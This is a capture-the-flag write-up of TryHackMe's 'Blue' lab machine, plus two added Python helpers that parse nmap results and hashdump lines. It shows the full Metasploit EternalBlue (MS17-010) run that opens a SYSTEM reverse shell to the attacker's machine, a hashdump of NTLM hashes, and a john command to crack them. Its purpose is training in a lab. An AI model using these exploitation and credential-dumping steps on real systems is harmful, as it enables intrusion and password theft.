TryHackMe Blue writeup

Blue is the second machine in TryHackMe’s “Offensive pentesting” path.


Enumeration

We will start with an nmap scan of the target (service detection, verbose output, and the vuln NSE script category):

nmap -sV -vv --script vuln 10.10.221.153

PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49158/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

This machine is vulnerable to MS17-010 (CVE-2017-0143), the SMBv1 flaw that nmap’s smb-vuln-ms17-010 script flags and whose public exploit is known in the media as EternalBlue.

It can be exploited without Metasploit, of course, but that will be time-consuming.

I’ll probably describe the non-Metasploit method next time.
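Reading a vuln scan by eye works for one host, but the host-script block mixes three different outcomes: a confirmed VULNERABLE verdict, a plain `false`, and an NT_STATUS error meaning the check could not run at all. The following added example (my own code, not part of the original writeup or of nmap) parses that block into structured findings so the three cases are kept apart; the sample input is the scan output above, trimmed, and the function names are my own.

```python
import re

# Constructed sample: the host-script block of the scan above, trimmed.
NMAP_HOST_SCRIPTS = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

def parse_host_scripts(text):
    """Return {script_name: {"state": ..., "cves": [...], "risk": ...}}."""
    findings, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):         # header or port table, not script output
            continue
        body = line[1:].lstrip("_")          # "|_" marks the last line of a script's output
        indent = len(body) - len(body.lstrip(" "))
        body = body.strip()
        if indent <= 1:                      # top level: "<script-name>: <one-line result>"
            name, _, rest = body.partition(":")
            current = findings.setdefault(name, {"state": None, "cves": [], "risk": None})
            rest = rest.strip()
            if rest == "false":
                current["state"] = "NOT VULNERABLE"
            elif rest:                       # NT_STATUS_ACCESS_DENIED etc.: check did not run
                current["state"] = "ERROR: " + rest
            continue
        if current is None:
            continue
        key, _, value = body.partition(":")  # nested detail line of a multi-line result
        key, value = key.strip(), value.strip()
        if key == "State":
            current["state"] = value
        elif key == "IDs":
            current["cves"] += re.findall(r"CVE-\d{4}-\d+", value)
        elif key == "Risk factor":
            current["risk"] = value
    return findings

def confirmed_vulnerable(findings):
    """Scripts with a positive VULNERABLE verdict; 'false' and errors are excluded."""
    return sorted(n for n, f in findings.items() if f["state"] == "VULNERABLE")
```

An ERROR entry is not a clean result: an access-denied check should be re-run with credentials or verified another way before it is written off as "not vulnerable".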


Exploitation

Run Metasploit:

msfconsole

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

Set up the exploit:

msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0

It should work as it is, but you might also need to change LPORT. Hit run:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

The process of migrating the shell is well described in the official material, but I didn’t have any issues with the shell as it is.


Post Exploitation

As the shell is already running as NT AUTHORITY\SYSTEM, we don’t need to do a PrivEsc. However, you might still collect some useful data from the compromised machine. Most OSCP lab machines have something juicy to find once you become root. Don’t skip the enumeration! To grab the users’ hashes, we can use the hashdump command:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We have a hash now! Let’s crack it. Save the hash to a file (jon.hash in my case) and crack it with john:

/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash

Yay! We have Jon’s password now.
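Before cracking anything, it is worth reading what hashdump actually printed. Each line is pwdump format, user:RID:LM:NT:::, and the two values that repeat on every line above are well-known constants: the LM hash of an empty string (also what Windows stores when LM hashing is disabled) and the NT hash of an empty string, i.e. a blank password. The following added example (my own code, not part of the original writeup or of Metasploit) parses the dump and turns those facts into audit notes; the sample input is the hashdump output above, and the function names and note wording are my own.

```python
# Constructed sample: the pwdump-format lines hashdump printed above.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

# Well-known values: the LM hash of "" (also stored when LM hashing is disabled)
# and the NT hash of "" (the account has a blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_hashdump(text):
    """Parse 'user:rid:lm:nt:::' lines into dicts; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:      # not two hex digests: not a pwdump line
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return accounts


def classify(account):
    """Audit notes for one account, read off the stored hashes alone."""
    notes = []
    if account["nt"] == EMPTY_NT:
        notes.append("blank password")          # disabled built-ins look like this too
    if account["lm"] != EMPTY_LM:
        notes.append("LM hash stored")          # legacy hash: LM storage still enabled
    if account["rid"] == 500:
        notes.append("built-in Administrator")  # RID 500 whatever the account is named
    return notes


def audit_hashdump(text):
    """Map each dumped account name to its audit notes (empty list: nothing flagged)."""
    return {a["user"]: classify(a) for a in parse_hashdump(text)}
```

On this box only Jon has a real NT hash, which is why his is the one sent to john; the empty NT hashes on Administrator and Guest are consistent with the disabled default accounts and would not crack to anything useful.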


Capturing flags

Well, the exercise explicitly asks you to submit flags, but don’t think of them as CTF flags. A flag in a good CTF is located somewhere you can’t reach without going the extra mile. There are three flags on this machine, and they are placed in quite sensitive places:

- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents

That makes sense: System32/config/ is where the SAM file is located, and Jon is the admin, so something helpful might be found in his Documents folder, etc.


Takeaway

  • Exploits rarely work fine out of the box. Sometimes you need a lot of patience to make one work.

  • Not all exploits (especially if we’re talking about kernel exploits) are stable. You might need to restart this box a bunch of times.

  • Using Metasploit doesn’t always mean that your exploitation phase will go smoothly.

  • The post-exploitation phase is important.